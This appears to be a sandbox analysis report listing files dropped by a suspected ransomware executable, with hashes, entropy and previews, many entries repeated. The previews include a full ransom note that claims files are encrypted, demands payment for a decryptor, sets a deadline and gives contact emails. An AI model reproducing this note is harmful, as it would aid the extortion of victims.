                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):436
                                                                                                    Entropy (8bit):7.4664651036545235
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:GXIFCuwDX3NxFWJdKJxpUvOXxodeTPfHPZY0X8/92wn:GX4C/DX3NDWJdKLpUvOBXDfHPxX8/9/
                                                                                                    MD5:3A8BD00EC26F0155E671716985F0A51B
                                                                                                    SHA1:049F1A9EE31BC708F17F1A39A5DBAA6412C3E3A1
                                                                                                    SHA-256:CB08B4A199EEC298ECF72261AFC4175367C78250DDCB09A111B1CEDB5B4D196C
                                                                                                    SHA-512:87717A49D7E8B676E3F785CB97DFDB15737119FE9F581D1A29D46ECD35D03FBF65E291A3818F110FAB98BE8D15EFAD24F9EF67FDAD36201778F2E1D0C9FBC6D7
                                                                                                    Malicious:false
                                                                                                    Preview:.@.w...`.r.......E.[;..$* ...\.d.; ...r.Ty..[.r.(5..Wo..`...rj/.[d...w.vLaK.......MS!..v.W.2. ...n.)....)`^.s4+.%........4.&.qw)...in.....-m......6*..8.1.1.....K......*.....r.Tf.x..wB.d..Q=..I..n9.q_(6.sg..X/.. .:.......`..'....@...P..'..-...."3D...T.....+h.MN1x..g.Yy...;5q.|.w...<....... .i..p.....N.4..f%.9..%&..*.V. F.Sa.=7.O.]4}S1.I;.."m(..[.o9"....3...u5...).C0h.I.p.......}.....n9...4...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:OpenPGP Public Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):436
                                                                                                    Entropy (8bit):7.4664651036545235
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:GXIFCuwDX3NxFWJdKJxpUvOXxodeTPfHPZY0X8/92wn:GX4C/DX3NDWJdKLpUvOBXDfHPxX8/9/
                                                                                                    MD5:3A8BD00EC26F0155E671716985F0A51B
                                                                                                    SHA1:049F1A9EE31BC708F17F1A39A5DBAA6412C3E3A1
                                                                                                    SHA-256:CB08B4A199EEC298ECF72261AFC4175367C78250DDCB09A111B1CEDB5B4D196C
                                                                                                    SHA-512:87717A49D7E8B676E3F785CB97DFDB15737119FE9F581D1A29D46ECD35D03FBF65E291A3818F110FAB98BE8D15EFAD24F9EF67FDAD36201778F2E1D0C9FBC6D7
                                                                                                    Malicious:false
                                                                                                    Preview:.@.w...`.r.......E.[;..$* ...\.d.; ...r.Ty..[.r.(5..Wo..`...rj/.[d...w.vLaK.......MS!..v.W.2. ...n.)....)`^.s4+.%........4.&.qw)...in.....-m......6*..8.1.1.....K......*.....r.Tf.x..wB.d..Q=..I..n9.q_(6.sg..X/.. .:.......`..'....@...P..'..-...."3D...T.....+h.MN1x..g.Yy...;5q.|.w...<....... .i..p.....N.4..f%.9..%&..*.V. F.Sa.=7.O.]4}S1.I;.."m(..[.o9"....3...u5...).C0h.I.p.......}.....n9...4...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1200
                                                                                                    Entropy (8bit):7.8376803871223215
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:AtoOrc+lXcAV1060tB38B7bGVhdozy5tEnv6peRH5j9+OQ4T:QogMAVb0L8tbGVhdaKEv6poHJUg
                                                                                                    MD5:C002434319A7B92787C6233588332004
                                                                                                    SHA1:4901EA0853E9477BAD3A3C28F759ED24E6577E55
                                                                                                    SHA-256:842BA06AE4B2148BCDA272916C878A45D2C99CA05180E22BE267347E6828E5DE
                                                                                                    SHA-512:2FB01BA3E10CCB87303A4D1B12660FB9ECFEFE40B24004887A90C5C32D8CA92130818EBBA40BF40AA15F810D89825C9FD3BFA56E7BCDEE8260DF54D1B580A9BF
                                                                                                    Malicious:false
                                                                                                    Preview:K99.....=.8....?..y..{............].C..+6..z!.v.8...+.._.j9.k.z.T'g1....CT[.-.G.E.>.....P.. ..Fhm.j....j.Ad..-#....(m'..6I%.j..6.x.~.......=.i..H.;........Vd&%+ Q?.h.0L...j.x..m.-..'.4..,4.a..w..@..l...|.*R...u;...S3p.....g.TN-*...B.".s6.bf........e..4...z...PE..UP"...,.e...}h.E.QJ...K.2..l......N+l.d..fLR=......ta..dZG...T.j............9Fbu.-Re.Z.s..H._e.s........O....A....o.Gt7....H5.r.Tb....G.".r{G).X......1..9X."Op...%D.../.X..PH........nLfZ..v=oHM.^....O.t..].(.....n..=p..B......i.....#...G..w...L.{.....p.58....V..[~.....@P{K..B\F0..V.I...>/..V.xK9.h....D..g">^.z..m.!6?..?.R..%!_..HN#...\['./.x.......i......._kET..x...W.t.....K.#..QA.......B.....\...."OLT8.>K._.q}...|..6.h=...v..W.h..P.dRw......g........{/..HO...o.....;...HS..u.....]Xc...'l.......Y..w..CW.n.\...f....n^.3.w........TB*.If.......M<..%.\O.s[R).ug'.K.c.O.3>N.Y.i.....*.,..."....3.l:.@P.0.\.....,...Y..2.....C.x...x22..V.R..6......DrN.....*^.VQw.....,..........d-B.s..|X.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1200
                                                                                                    Entropy (8bit):7.8376803871223215
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:AtoOrc+lXcAV1060tB38B7bGVhdozy5tEnv6peRH5j9+OQ4T:QogMAVb0L8tbGVhdaKEv6poHJUg
                                                                                                    MD5:C002434319A7B92787C6233588332004
                                                                                                    SHA1:4901EA0853E9477BAD3A3C28F759ED24E6577E55
                                                                                                    SHA-256:842BA06AE4B2148BCDA272916C878A45D2C99CA05180E22BE267347E6828E5DE
                                                                                                    SHA-512:2FB01BA3E10CCB87303A4D1B12660FB9ECFEFE40B24004887A90C5C32D8CA92130818EBBA40BF40AA15F810D89825C9FD3BFA56E7BCDEE8260DF54D1B580A9BF
                                                                                                    Malicious:false
                                                                                                    Preview:K99.....=.8....?..y..{............].C..+6..z!.v.8...+.._.j9.k.z.T'g1....CT[.-.G.E.>.....P.. ..Fhm.j....j.Ad..-#....(m'..6I%.j..6.x.~.......=.i..H.;........Vd&%+ Q?.h.0L...j.x..m.-..'.4..,4.a..w..@..l...|.*R...u;...S3p.....g.TN-*...B.".s6.bf........e..4...z...PE..UP"...,.e...}h.E.QJ...K.2..l......N+l.d..fLR=......ta..dZG...T.j............9Fbu.-Re.Z.s..H._e.s........O....A....o.Gt7....H5.r.Tb....G.".r{G).X......1..9X."Op...%D.../.X..PH........nLfZ..v=oHM.^....O.t..].(.....n..=p..B......i.....#...G..w...L.{.....p.58....V..[~.....@P{K..B\F0..V.I...>/..V.xK9.h....D..g">^.z..m.!6?..?.R..%!_..HN#...\['./.x.......i......._kET..x...W.t.....K.#..QA.......B.....\...."OLT8.>K._.q}...|..6.h=...v..W.h..P.dRw......g........{/..HO...o.....;...HS..u.....]Xc...'l.......Y..w..CW.n.\...f....n^.3.w........TB*.If.......M<..%.\O.s[R).ug'.K.c.O.3>N.Y.i.....*.,..."....3.l:.@P.0.\.....,...Y..2.....C.x...x22..V.R..6......DrN.....*^.VQw.....,..........d-B.s..|X.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):67950
                                                                                                    Entropy (8bit):7.850032082462207
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:tWpcGrjw2RAal82F5EwtJqF1WlDBGOFBbVEmE:oprs2RARw5JqFoJnbhE
                                                                                                    MD5:AF463EDA1337B25B3DDEB622D5414BBF
                                                                                                    SHA1:CCFF7C1473DB6080A28BD7EF7F86C49F9DA30EDF
                                                                                                    SHA-256:9FEB158846F358124B753E77354BDA7C9B7F1A8DC108DD59F37F5DB26C37BDA9
                                                                                                    SHA-512:4276ED6D078623C7216E23574FFE965B99A116A40A86B0ED25F0FC4596A3A10F4194CB92504F8761F25BAE3064CFF6C5FA8929674B2A9334A0E39B565E2147E6
                                                                                                    Malicious:false
                                                                                                    Preview:..G..<....2...)f.=.$......-...Z.....R.K....v.Gv.<..oS.fZ....R...z..".k...8A.]4........}.\..v`....MC....8.s..u...d(&\_.....J.N*.. .......'..*J.:m8ub......<G.h.eU...{'n..S.G.ud...G......L.*N.%H,E..]"...|.... .}..$..p...f.3.....b.Dy"......o(..|..Jz]...9.M..:KZ5Ey.....K.iu.P...[XL.5......a.WO.<.....9.|..(.m.}..&.h.6..'<:.P..t.,.&=.....:R.......Bz......j.<.>....zD^z/.C...$.C......... V._j-.4.^.!.>`.q....T....d.....N#...G.u.ud[7b.}XJm.K.../.G D,.:.\.9.P...l.3..,s.....Y.^.v.(...k.RH.......c.z.M....#.*..8@...}9...].?.........(9f$u.O.X.Z?...:W......J$5aZ.B...u.XB.../..#3.AL#w.s.....!.=G....)...^...$....+2.E3.........m.....i..'[mg.3:..z.o.+-.W.......N.P".'xg:.......~..t.D1.V.? )..._.%C[....\i)'.1.....m-S`..R.w..G..H...:..+.:).sv..X.Y...9.wc...!\.n.....Gu.m}E.Is...MA..5ARR./..:.[k..2.......E...{...-r.+....c#M.g:.x..kv...dgC......a.O...B...).gH..X.eL..p...1..=q.a.w......e.....:......L......l.~..P.!O...;...).[.A:</s.......,f..Q.A..8..+O.p
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):67950
                                                                                                    Entropy (8bit):7.850032082462207
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:tWpcGrjw2RAal82F5EwtJqF1WlDBGOFBbVEmE:oprs2RARw5JqFoJnbhE
                                                                                                    MD5:AF463EDA1337B25B3DDEB622D5414BBF
                                                                                                    SHA1:CCFF7C1473DB6080A28BD7EF7F86C49F9DA30EDF
                                                                                                    SHA-256:9FEB158846F358124B753E77354BDA7C9B7F1A8DC108DD59F37F5DB26C37BDA9
                                                                                                    SHA-512:4276ED6D078623C7216E23574FFE965B99A116A40A86B0ED25F0FC4596A3A10F4194CB92504F8761F25BAE3064CFF6C5FA8929674B2A9334A0E39B565E2147E6
                                                                                                    Malicious:false
                                                                                                    Preview:..G..<....2...)f.=.$......-...Z.....R.K....v.Gv.<..oS.fZ....R...z..".k...8A.]4........}.\..v`....MC....8.s..u...d(&\_.....J.N*.. .......'..*J.:m8ub......<G.h.eU...{'n..S.G.ud...G......L.*N.%H,E..]"...|.... .}..$..p...f.3.....b.Dy"......o(..|..Jz]...9.M..:KZ5Ey.....K.iu.P...[XL.5......a.WO.<.....9.|..(.m.}..&.h.6..'<:.P..t.,.&=.....:R.......Bz......j.<.>....zD^z/.C...$.C......... V._j-.4.^.!.>`.q....T....d.....N#...G.u.ud[7b.}XJm.K.../.G D,.:.\.9.P...l.3..,s.....Y.^.v.(...k.RH.......c.z.M....#.*..8@...}9...].?.........(9f$u.O.X.Z?...:W......J$5aZ.B...u.XB.../..#3.AL#w.s.....!.=G....)...^...$....+2.E3.........m.....i..'[mg.3:..z.o.+-.W.......N.P".'xg:.......~..t.D1.V.? )..._.%C[....\i)'.1.....m-S`..R.w..G..H...:..+.:).sv..X.Y...9.wc...!\.n.....Gu.m}E.Is...MA..5ARR./..:.[k..2.......E...{...-r.+....c#M.g:.x..kv...dgC......a.O...B...).gH..X.eL..p...1..=q.a.w......e.....:......L......l.~..P.!O...;...).[.A:</s.......,f..Q.A..8..+O.p
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):112129
                                                                                                    Entropy (8bit):7.7102423332968435
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:ZYQ/IUDIVYNhZBIDt9KFHgoYF0gOY0yLEJdUjMcpP:pAfAZsVFF0gOjymdYj
                                                                                                    MD5:9C9620CBF1DDE32613CB171DA57668C7
                                                                                                    SHA1:F7783EB4C785DDA88CE1E38BDC4EA1365A0F771D
                                                                                                    SHA-256:3FEAD87933C90A717CAB116FF2139A7AD64716C1190BF612BC7ECD0E287F2A93
                                                                                                    SHA-512:FC539586DB8390033BA309937FA8460769E8D0F0544C545AB1D16BD7E91509DB71C722924023FD85D03A986477E108E3634BF3873AEFDBAA49928C0613D72B3B
                                                                                                    Malicious:false
